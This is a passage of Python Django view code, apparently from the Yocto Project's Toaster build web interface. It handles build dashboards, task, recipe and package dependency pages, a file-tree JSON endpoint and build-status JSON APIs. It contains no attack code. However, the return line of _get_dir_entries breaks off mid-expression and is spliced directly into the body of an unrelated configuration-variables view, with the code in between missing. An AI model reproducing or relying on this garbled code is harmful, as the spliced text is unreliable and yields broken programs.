this is usefull in case parameters are set\n# manually from the GET values of the link\ndef _set_parameters_values(pagesize, orderby, request):\n from django.urls import resolve\n current_url = resolve(request.path_info).url_name\n request.session['%s_count' % current_url] = pagesize\n request.session['%s_orderby' % current_url] =orderby\n\n# date range: normalize GUI's dd/mm/yyyy to date object\ndef _normalize_input_date(date_str,default):\n date_str=re.sub('/', '-', date_str)\n # accept dd/mm/yyyy to d/m/yy\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%Y\")\n except ValueError:\n # courtesy try with two digit year\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%y\")\n except ValueError:\n return default\n date_in = date_in.replace(tzinfo=default.tzinfo)\n return date_in\n\n# convert and normalize any received date range filter, for example:\n# \"completed_on__gte!completed_on__lt:01/03/2015!02/03/2015_daterange\" to\n# \"completed_on__gte!completed_on__lt:2015-03-01!2015-03-02\"\ndef _modify_date_range_filter(filter_string):\n # was the date range radio button selected?\n if 0 > filter_string.find('_daterange'):\n return filter_string,''\n # normalize GUI dates to database format\n filter_string = filter_string.replace('_daterange','').replace(':','!');\n filter_list = filter_string.split('!');\n if 4 != len(filter_list):\n return filter_string\n today = timezone.localtime(timezone.now())\n date_id = filter_list[1]\n date_from = _normalize_input_date(filter_list[2],today)\n date_to = _normalize_input_date(filter_list[3],today)\n # swap dates if manually set dates are out of order\n if date_to < date_from:\n date_to,date_from = date_from,date_to\n # convert to strings, make 'date_to' inclusive by moving to begining of next day\n date_from_str = date_from.strftime(\"%Y-%m-%d\")\n date_to_str = (date_to+timedelta(days=1)).strftime(\"%Y-%m-%d\")\n filter_string=filter_list[0]+'!'+filter_list[1]+':'+date_from_str+'!'+date_to_str\n daterange_selected = re.sub('__.*','', date_id)\n return filter_string,daterange_selected\n\ndef _add_daterange_context(queryset_all, request, daterange_list):\n # calculate the exact begining of local today and yesterday\n today_begin = timezone.localtime(timezone.now())\n yesterday_begin = today_begin - timedelta(days=1)\n # add daterange persistent\n context_date = {}\n context_date['last_date_from'] = request.GET.get('last_date_from',timezone.localtime(timezone.now()).strftime(\"%d/%m/%Y\"))\n context_date['last_date_to' ] = request.GET.get('last_date_to' ,context_date['last_date_from'])\n # calculate the date ranges, avoid second sort for 'created'\n # fetch the respective max range from the database\n context_date['daterange_filter']=''\n for key in daterange_list:\n queryset_key = queryset_all.order_by(key)\n try:\n context_date['dateMin_'+key]=timezone.localtime(getattr(queryset_key.first(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMin_'+key]=timezone.localtime(timezone.now())\n try:\n context_date['dateMax_'+key]=timezone.localtime(getattr(queryset_key.last(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMax_'+key]=timezone.localtime(timezone.now())\n return context_date,today_begin,yesterday_begin\n\n\n##\n# build dashboard for a single build, coming in as argument\n# Each build may contain multiple targets and each target\n# may generate multiple image files. 
display them all.\n#\ndef builddashboard( request, build_id ):\n template = \"builddashboard.html\"\n if Build.objects.filter( pk=build_id ).count( ) == 0 :\n return redirect( builds )\n build = Build.objects.get( pk = build_id );\n layerVersionId = Layer_Version.objects.filter( build = build_id );\n recipeCount = Recipe.objects.filter( layer_version__id__in = layerVersionId ).count( );\n tgts = Target.objects.filter( build_id = build_id ).order_by( 'target' );\n\n # set up custom target list with computed package and image data\n targets = []\n ntargets = 0\n\n # True if at least one target for this build has an SDK artifact\n # or image file\n has_artifacts = False\n\n for t in tgts:\n elem = {}\n elem['target'] = t\n\n target_has_images = False\n image_files = []\n\n npkg = 0\n pkgsz = 0\n package = None\n # Chunk the query to avoid \"too many SQL variables\" error\n package_set = t.target_installed_package_set.all()\n package_set_len = len(package_set)\n for ps_start in range(0,package_set_len,500):\n ps_stop = min(ps_start+500,package_set_len)\n for package in Package.objects.filter(id__in = [x.package_id for x in package_set[ps_start:ps_stop]]):\n pkgsz = pkgsz + package.size\n if package.installed_name:\n npkg = npkg + 1\n elem['npkg'] = npkg\n elem['pkgsz'] = pkgsz\n ti = Target_Image_File.objects.filter(target_id = t.id)\n for i in ti:\n ndx = i.file_name.rfind('/')\n if ndx < 0:\n ndx = 0;\n f = i.file_name[ndx + 1:]\n image_files.append({\n 'id': i.id,\n 'path': f,\n 'size': i.file_size,\n 'suffix': i.suffix\n })\n if len(image_files) > 0:\n target_has_images = True\n elem['targetHasImages'] = target_has_images\n\n elem['imageFiles'] = image_files\n elem['target_kernel_artifacts'] = t.targetkernelfile_set.all()\n\n target_sdk_files = t.targetsdkfile_set.all()\n target_sdk_artifacts_count = target_sdk_files.count()\n elem['target_sdk_artifacts_count'] = target_sdk_artifacts_count\n elem['target_sdk_artifacts'] = target_sdk_files\n\n if target_has_images or target_sdk_artifacts_count > 0:\n has_artifacts = True\n\n targets.append(elem)\n\n ##\n # how many packages in this build - ignore anonymous ones\n #\n\n packageCount = 0\n packages = Package.objects.filter( build_id = build_id )\n for p in packages:\n if ( p.installed_name ):\n packageCount = packageCount + 1\n\n logmessages = list(LogMessage.objects.filter( build = build_id ))\n\n context = {\n 'build' : build,\n 'project' : build.project,\n 'hasArtifacts' : has_artifacts,\n 'ntargets' : ntargets,\n 'targets' : targets,\n 'recipecount' : recipeCount,\n 'packagecount' : packageCount,\n 'logmessages' : logmessages,\n }\n return toaster_render( request, template, context )\n\n\n\ndef generateCoveredList2( revlist = None ):\n if not revlist:\n revlist = []\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n while len(covered_list):\n revlist = [ x for x in revlist if x.outcome != Task.OUTCOME_COVERED ]\n if len(revlist) > 0:\n return revlist\n\n newlist = _find_task_revdep_list(covered_list)\n\n revlist = list(set(revlist + newlist))\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n return revlist\n\ndef task( request, build_id, task_id ):\n template = \"task.html\"\n tasks_list = Task.objects.filter( pk=task_id )\n if tasks_list.count( ) == 0:\n return redirect( builds )\n task_object = tasks_list[ 0 ];\n dependencies = sorted(\n _find_task_dep( task_object ),\n key=lambda t:'%s_%s %s'%(t.recipe.name, t.recipe.version, t.task_name))\n reverse_dependencies = sorted(\n 
_find_task_revdep( task_object ),\n key=lambda t:'%s_%s %s'%( t.recipe.name, t.recipe.version, t.task_name ))\n coveredBy = '';\n if ( task_object.outcome == Task.OUTCOME_COVERED ):\n# _list = generateCoveredList( task )\n coveredBy = sorted(generateCoveredList2( _find_task_revdep( task_object ) ), key = lambda x: x.recipe.name)\n log_head = ''\n log_body = ''\n if task_object.outcome == task_object.OUTCOME_FAILED:\n pass\n\n uri_list= [ ]\n variables = Variable.objects.filter(build=build_id)\n v=variables.filter(variable_name='SSTATE_DIR')\n if v.count() > 0:\n uri_list.append(v[0].variable_value)\n v=variables.filter(variable_name='SSTATE_MIRRORS')\n if (v.count() > 0):\n for mirror in v[0].variable_value.split('\\\\n'):\n s=re.sub('.* ','',mirror.strip(' \\t\\n\\r'))\n if len(s):\n uri_list.append(s)\n\n context = {\n 'build' : Build.objects.filter( pk = build_id )[ 0 ],\n 'object' : task_object,\n 'task' : task_object,\n 'covered_by' : coveredBy,\n 'deps' : dependencies,\n 'rdeps' : reverse_dependencies,\n 'log_head' : log_head,\n 'log_body' : log_body,\n 'showing_matches' : False,\n 'uri_list' : uri_list,\n 'task_in_tasks_table_pg': int(task_object.order / 25) + 1\n }\n if request.GET.get( 'show_matches', \"\" ):\n context[ 'showing_matches' ] = True\n context[ 'matching_tasks' ] = Task.objects.filter(\n sstate_checksum=task_object.sstate_checksum ).filter(\n build__completed_on__lt=task_object.build.completed_on).exclude(\n order__isnull=True).exclude(outcome=Task.OUTCOME_NA).order_by('-build__completed_on')\n\n return toaster_render( request, template, context )\n\ndef recipe(request, build_id, recipe_id, active_tab=\"1\"):\n template = \"recipe.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n layer_version = Layer_Version.objects.get(pk=recipe_object.layer_version_id)\n layer = Layer.objects.get(pk=layer_version.layer_id)\n tasks_list = Task.objects.filter(recipe_id = recipe_id, build_id = build_id).exclude(order__isnull=True).exclude(task_name__endswith='_setscene').exclude(outcome=Task.OUTCOME_NA)\n package_count = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0).count()\n\n if active_tab != '1' and active_tab != '3' and active_tab != '4' :\n active_tab = '1'\n tab_states = {'1': '', '3': '', '4': ''}\n tab_states[active_tab] = 'active'\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'object' : recipe_object,\n 'layer_version' : layer_version,\n 'layer' : layer,\n 'tasks' : tasks_list,\n 'package_count' : package_count,\n 'tab_states' : tab_states,\n }\n return toaster_render(request, template, context)\n\ndef recipe_packages(request, build_id, recipe_id):\n template = \"recipe_packages.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 10, 'name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'recipe_packages', request.GET, mandatory_parameters, build_id = build_id, recipe_id = recipe_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n queryset = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0)\n package_count = queryset.count()\n queryset = 
_get_queryset(Package, queryset, filter_string, search_term, ordering_string, 'name')\n\n packages = _build_page_range(Paginator(queryset, pagesize),request.GET.get('page', 1))\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'recipe' : recipe_object,\n 'objects' : packages,\n 'object_count' : package_count,\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request,\"name\"),\n 'ordericon': _get_toggle_order_icon(request,\"name\"),\n 'orderkey': \"name\",\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request,\"size\", True),\n 'ordericon': _get_toggle_order_icon(request,\"size\"),\n 'orderkey': 'size',\n 'dclass': 'sizecol span2',\n },\n ]\n }\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\nfrom django.http import HttpResponse\n@log_view_mixin\ndef xhr_dirinfo(request, build_id, target_id):\n top = request.GET.get('start', '/')\n return HttpResponse(_get_dir_entries(build_id, target_id, top), content_type = \"application/json\")\n\nfrom django.utils.functional import Promise\nfrom django.utils.encoding import force_str\nclass LazyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Promise):\n return force_str(obj)\n return super(LazyEncoder, self).default(obj)\n\nfrom toastergui.templatetags.projecttags import filtered_filesizeformat\nimport os\ndef _get_dir_entries(build_id, target_id, start):\n node_str = {\n Target_File.ITYPE_REGULAR : '-',\n Target_File.ITYPE_DIRECTORY : 'd',\n Target_File.ITYPE_SYMLINK : 'l',\n Target_File.ITYPE_SOCKET : 's',\n Target_File.ITYPE_FIFO : 'p',\n Target_File.ITYPE_CHARACTER : 'c',\n Target_File.ITYPE_BLOCK : 'b',\n }\n response = []\n objects = Target_File.objects.filter(target__exact=target_id, directory__path=start)\n target_packages = Target_Installed_Package.objects.filter(target__exact=target_id).values_list('package_id', flat=True)\n for o in objects:\n # exclude root inode '/'\n if o.path == '/':\n continue\n try:\n entry = {}\n entry['parent'] = start\n entry['name'] = os.path.basename(o.path)\n entry['fullpath'] = o.path\n\n # set defaults, not all dentries have packages\n entry['installed_package'] = None\n entry['package_id'] = None\n entry['package'] = None\n entry['link_to'] = None\n if o.inodetype == Target_File.ITYPE_DIRECTORY:\n entry['isdir'] = 1\n # is there content in directory\n entry['childcount'] = Target_File.objects.filter(target__exact=target_id, directory__path=o.path).all().count()\n else:\n entry['isdir'] = 0\n\n # resolve the file to get the package from the resolved file\n resolved_id = o.sym_target_id\n resolved_path = o.path\n if target_packages.count():\n while resolved_id != \"\" and resolved_id is not None:\n tf = Target_File.objects.get(pk=resolved_id)\n resolved_path = tf.path\n resolved_id = tf.sym_target_id\n\n thisfile=Package_File.objects.all().filter(path__exact=resolved_path, package_id__in=target_packages)\n if thisfile.count():\n p = Package.objects.get(pk=thisfile[0].package_id)\n entry['installed_package'] = p.installed_name\n entry['package_id'] = str(p.id)\n entry['package'] = p.name\n # don't use resolved path from above, show immediate link-to\n if o.sym_target_id != \"\" and o.sym_target_id is not None:\n entry['link_to'] = Target_File.objects.get(pk=o.sym_target_id).path\n entry['size'] = filtered_filesizeformat(o.size)\n if entry['link_to'] is not None:\n entry['permission'] = node_str[o.inodetype] + o.permission\n 
else:\n entry['permission'] = node_str[o.inodetype] + o.permission\n entry['owner'] = o.owner\n entry['group'] = o.group\n response.append(entry)\n\n except Exception as e:\n print(\"Exception \", e)\n traceback.print_exc()\n\n # sort by directories first, then by name\n rsorted = sorted(response, key=lambda entry : entry['name'])\n rsorted = sorted(rsorted, key=lambda entry : entry['isdir'], reverse=True)\n return json.dumps(rsorted, cls=LazyEncoder).replace(' 0:\n file_filter += 'conf/(local|bblayers).conf'\n if filter_string.find('conf/machine/') > 0:\n file_filter += 'conf/machine/'\n if filter_string.find('conf/distro/') > 0:\n file_filter += 'conf/distro/'\n if filter_string.find('/bitbake.conf') > 0:\n file_filter += '/bitbake.conf'\n build_dir=re.sub(\"/tmp/log/.*\",\"\",Build.objects.get(pk=build_id).cooker_log_path)\n\n build = Build.objects.get(pk=build_id)\n\n context = {\n 'objectname': 'configvars',\n 'object_search_display':'BitBake variables',\n 'filter_search_display':'variables',\n 'file_filter': file_filter,\n 'build': build,\n 'project': build.project,\n 'objects' : variables,\n 'total_count':queryset_with_search.count(),\n 'default_orderby' : 'variable_name:+',\n 'search_term':search_term,\n # Specifies the display of columns for the table, appearance in \"Edit columns\" box, toggling default show/hide, and specifying filters for columns\n 'tablecols' : [\n {'name': 'Variable',\n 'qhelp': \"BitBake is a generic task executor that considers a list of tasks with dependencies and handles metadata that consists of variables in a certain format that get passed to the tasks\",\n 'orderfield': _get_toggle_order(request, \"variable_name\"),\n 'ordericon':_get_toggle_order_icon(request, \"variable_name\"),\n },\n {'name': 'Value',\n 'qhelp': \"The value assigned to the variable\",\n },\n {'name': 'Set in file',\n 'qhelp': \"The last configuration file that touched the variable value\",\n 'clclass': 'file', 'hidden' : 0,\n 'orderkey' : 'vhistory__file_name',\n 'filter' : {\n 'class' : 'vhistory__file_name',\n 'label': 'Show:',\n 'options' : [\n ('Local configuration variables', 'vhistory__file_name__contains:'+build_dir+'/conf/',queryset_with_search.filter(vhistory__file_name__contains=build_dir+'/conf/').count(), 'Select this filter to see variables set by the local.conf and bblayers.conf configuration files inside the /build/conf/ directory'),\n ('Machine configuration variables', 'vhistory__file_name__contains:conf/machine/',queryset_with_search.filter(vhistory__file_name__contains='conf/machine').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/machine/ directory'),\n ('Distro configuration variables', 'vhistory__file_name__contains:conf/distro/',queryset_with_search.filter(vhistory__file_name__contains='conf/distro').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/distro/ directory'),\n ('Layer configuration variables', 'vhistory__file_name__contains:conf/layer.conf',queryset_with_search.filter(vhistory__file_name__contains='conf/layer.conf').count(), 'Select this filter to see variables set by the layer.conf configuration file inside your layers'),\n ('bitbake.conf variables', 'vhistory__file_name__contains:/bitbake.conf',queryset_with_search.filter(vhistory__file_name__contains='/bitbake.conf').count(), 'Select this filter to see variables set by the bitbake.conf configuration file'),\n ]\n },\n },\n {'name': 'Description',\n 'qhelp': \"A brief explanation of the 
variable\",\n 'clclass': 'description', 'hidden' : 0,\n 'dclass': \"span4\",\n 'filter' : {\n 'class' : 'description',\n 'label': 'Show:',\n 'options' : [\n ('Variables with description', 'description__regex:.+', queryset_with_search.filter(description__regex='.+').count(), 'We provide descriptions for the most common BitBake variables. The list of descriptions lives in meta/conf/documentation.conf'),\n ]\n },\n },\n ],\n }\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef bfile(request, build_id, package_id):\n template = 'bfile.html'\n files = Package_File.objects.filter(package = package_id)\n build = Build.objects.get(pk=build_id)\n context = {\n 'build': build,\n 'project': build.project,\n 'objects' : files\n }\n return toaster_render(request, template, context)\n\n\n# A set of dependency types valid for both included and built package views\nOTHER_DEPENDS_BASE = [\n Package_Dependency.TYPE_RSUGGESTS,\n Package_Dependency.TYPE_RPROVIDES,\n Package_Dependency.TYPE_RREPLACES,\n Package_Dependency.TYPE_RCONFLICTS,\n ]\n\n# value for invalid row id\nINVALID_KEY = -1\n\n\"\"\"\nGiven a package id, target_id retrieves two sets of this image and package's\ndependencies. The return value is a dictionary consisting of two other\nlists: a list of 'runtime' dependencies, that is, having RDEPENDS\nvalues in source package's recipe, and a list of other dependencies, that is\nthe list of possible recipe variables as found in OTHER_DEPENDS_BASE plus\nthe RRECOMMENDS or TRECOMMENDS value.\nThe lists are built in the sort order specified for the package runtime\ndependency views.\n\"\"\"\ndef _get_package_dependencies(package_id, target_id = INVALID_KEY):\n runtime_deps = []\n other_deps = []\n other_depends_types = OTHER_DEPENDS_BASE\n\n if target_id != INVALID_KEY :\n rdepends_type = Package_Dependency.TYPE_TRDEPENDS\n other_depends_types += [Package_Dependency.TYPE_TRECOMMENDS]\n else :\n rdepends_type = Package_Dependency.TYPE_RDEPENDS\n other_depends_types += [Package_Dependency.TYPE_RRECOMMENDS]\n\n package = Package.objects.get(pk=package_id)\n if target_id != INVALID_KEY :\n alldeps = package.package_dependencies_source.filter(target_id__exact = target_id)\n else :\n alldeps = package.package_dependencies_source.all()\n for idep in alldeps:\n dep_package = Package.objects.get(pk=idep.depends_on_id)\n dep_entry = Package_Dependency.DEPENDS_DICT[idep.dep_type]\n if dep_package.version == '' :\n version = ''\n else :\n version = dep_package.version + \"-\" + dep_package.revision\n installed = False\n if target_id != INVALID_KEY :\n if Target_Installed_Package.objects.filter(target_id__exact = target_id, package_id__exact = dep_package.id).count() > 0:\n installed = True\n dep = {\n 'name' : dep_package.name,\n 'version' : version,\n 'size' : dep_package.size,\n 'dep_type' : idep.dep_type,\n 'dep_type_display' : dep_entry[0].capitalize(),\n 'dep_type_help' : dep_entry[1] % (dep_package.name, package.name),\n 'depends_on_id' : dep_package.id,\n 'installed' : installed,\n }\n\n if target_id != INVALID_KEY:\n dep['alias'] = _get_package_alias(dep_package)\n\n if idep.dep_type == rdepends_type :\n runtime_deps.append(dep)\n elif idep.dep_type in other_depends_types :\n other_deps.append(dep)\n\n rdep_sorted = sorted(runtime_deps, key=lambda k: k['name'])\n odep_sorted = sorted(\n sorted(other_deps, key=lambda k: k['name']),\n key=lambda k: k['dep_type'])\n retvalues = {'runtime_deps' : rdep_sorted, 'other_deps' : 
odep_sorted}\n return retvalues\n\n# Return the count of packages dependent on package for this target_id image\ndef _get_package_reverse_dep_count(package, target_id):\n return package.package_dependencies_target.filter(target_id__exact=target_id, dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n\n# Return the count of the packages that this package_id is dependent on.\n# Use one of the two RDEPENDS types, either TRDEPENDS if the package was\n# installed, or else RDEPENDS if only built.\ndef _get_package_dependency_count(package, target_id, is_installed):\n if is_installed :\n return package.package_dependencies_source.filter(target_id__exact = target_id,\n dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n else :\n return package.package_dependencies_source.filter(dep_type__exact = Package_Dependency.TYPE_RDEPENDS).count()\n\ndef _get_package_alias(package):\n alias = package.installed_name\n if alias is not None and alias != '' and alias != package.name:\n return alias\n else:\n return ''\n\ndef _get_fullpackagespec(package):\n r = package.name\n version_good = package.version is not None and package.version != ''\n revision_good = package.revision is not None and package.revision != ''\n if version_good or revision_good:\n r += '_'\n if version_good:\n r += package.version\n if revision_good:\n r += '-'\n if revision_good:\n r += package.revision\n return r\n\ndef package_built_detail(request, build_id, package_id):\n template = \"package_built_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_built_detail', request.GET, mandatory_parameters, build_id = build_id, package_id = package_id)\n\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'dependency_count' : _get_package_dependency_count(package, -1, False),\n 'objects' : paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True;\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_built_dependencies(request, build_id, package_id):\n template = \"package_built_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n dependencies = _get_package_dependencies(package_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 
'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'dependency_count' : _get_package_dependency_count(package, -1, False)\n }\n return toaster_render(request, template, context)\n\n\ndef package_included_detail(request, build_id, target_id, package_id):\n template = \"package_included_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_detail', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'target' : target,\n 'package' : package,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'objects': paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_included_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n\n dependencies = _get_package_dependencies(package_id, target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True)\n }\n return toaster_render(request, template, context)\n\ndef package_included_reverse_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_reverse_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 25, 'package__name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 
'package_included_reverse_dependencies', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_Dependency.objects.select_related('depends_on').filter(depends_on=package_id, target_id=target_id, dep_type=Package_Dependency.TYPE_TRDEPENDS)\n objects = _get_queryset(Package_Dependency, queryset, filter_string, search_term, ordering_string, 'package__name')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n for o in objects:\n if o.package.version != '':\n o.package.version += '-' + o.package.revision\n o.alias = _get_package_alias(o.package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'objects' : objects,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request, \"package__name\"),\n 'ordericon': _get_toggle_order_icon(request, \"package__name\"),\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"package__size\", True),\n 'ordericon': _get_toggle_order_icon(request, \"package__size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if objects.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef image_information_dir(request, build_id, target_id, packagefile_id):\n # stubbed for now\n return redirect(builds)\n # the context processor that supplies data used across all the pages\n\n# a context processor which runs on every request; this provides the\n# projects and non_cli_projects (i.e. 
projects created by the user)\n# variables referred to in templates, which used to determine the\n# visibility of UI elements like the \"New build\" button\ndef managedcontextprocessor(request):\n projects = Project.objects.all()\n ret = {\n \"projects\": projects,\n \"non_cli_projects\": projects.exclude(is_default=True),\n \"DEBUG\" : toastermain.settings.DEBUG,\n \"TOASTER_BRANCH\": toastermain.settings.TOASTER_BRANCH,\n \"TOASTER_REVISION\" : toastermain.settings.TOASTER_REVISION,\n }\n return ret\n\n# REST-based API calls to return build/building status to external Toaster\n# managers and aggregators via JSON\n\ndef _json_build_status(build_id,extend):\n build_stat = None\n try:\n build = Build.objects.get( pk = build_id )\n build_stat = {}\n build_stat['id'] = build.id\n build_stat['name'] = build.build_name\n build_stat['machine'] = build.machine\n build_stat['distro'] = build.distro\n build_stat['start'] = build.started_on\n # look up target name\n target= Target.objects.get( build = build )\n if target:\n if target.task:\n build_stat['target'] = '%s:%s' % (target.target,target.task)\n else:\n build_stat['target'] = '%s' % (target.target)\n else:\n build_stat['target'] = ''\n # look up project name\n project = Project.objects.get( build = build )\n if project:\n build_stat['project'] = project.name\n else:\n build_stat['project'] = ''\n if Build.IN_PROGRESS == build.outcome:\n now = timezone.now()\n timediff = now - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['clone']='%d:%d' % (build.repos_cloned,build.repos_to_clone)\n build_stat['parse']='%d:%d' % (build.recipes_parsed,build.recipes_to_parse)\n tf = Task.objects.filter(build = build)\n tfc = tf.count()\n if tfc > 0:\n tfd = tf.exclude(order__isnull=True).count()\n else:\n tfd = 0\n build_stat['task']='%d:%d' % (tfd,tfc)\n else:\n build_stat['outcome'] = build.get_outcome_text()\n timediff = build.completed_on - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['stop'] = build.completed_on\n messages = LogMessage.objects.all().filter(build = build)\n errors = len(messages.filter(level=LogMessage.ERROR) |\n messages.filter(level=LogMessage.EXCEPTION) |\n messages.filter(level=LogMessage.CRITICAL))\n build_stat['errors'] = errors\n warnings = len(messages.filter(level=LogMessage.WARNING))\n build_stat['warnings'] = warnings\n if extend:\n build_stat['cooker_log'] = build.cooker_log_path\n except Exception as e:\n build_state = str(e)\n return build_stat\n\ndef json_builds(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.exclude(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'builds' : build_table, 'count' : len(builds)})\n\ndef json_building(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.filter(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'building' : build_table, 'count' : len(builds)})\n\ndef json_build(request,build_id):\n return JsonResponse({'build' : _json_build_status(build_id,True)})\n\n\nimport toastermain.settings\n\nfrom orm.models import Project, ProjectLayer, ProjectVariable\nfrom bldcontrol.models import BuildEnvironment\n\n# we have a set of functions if we're in managed 
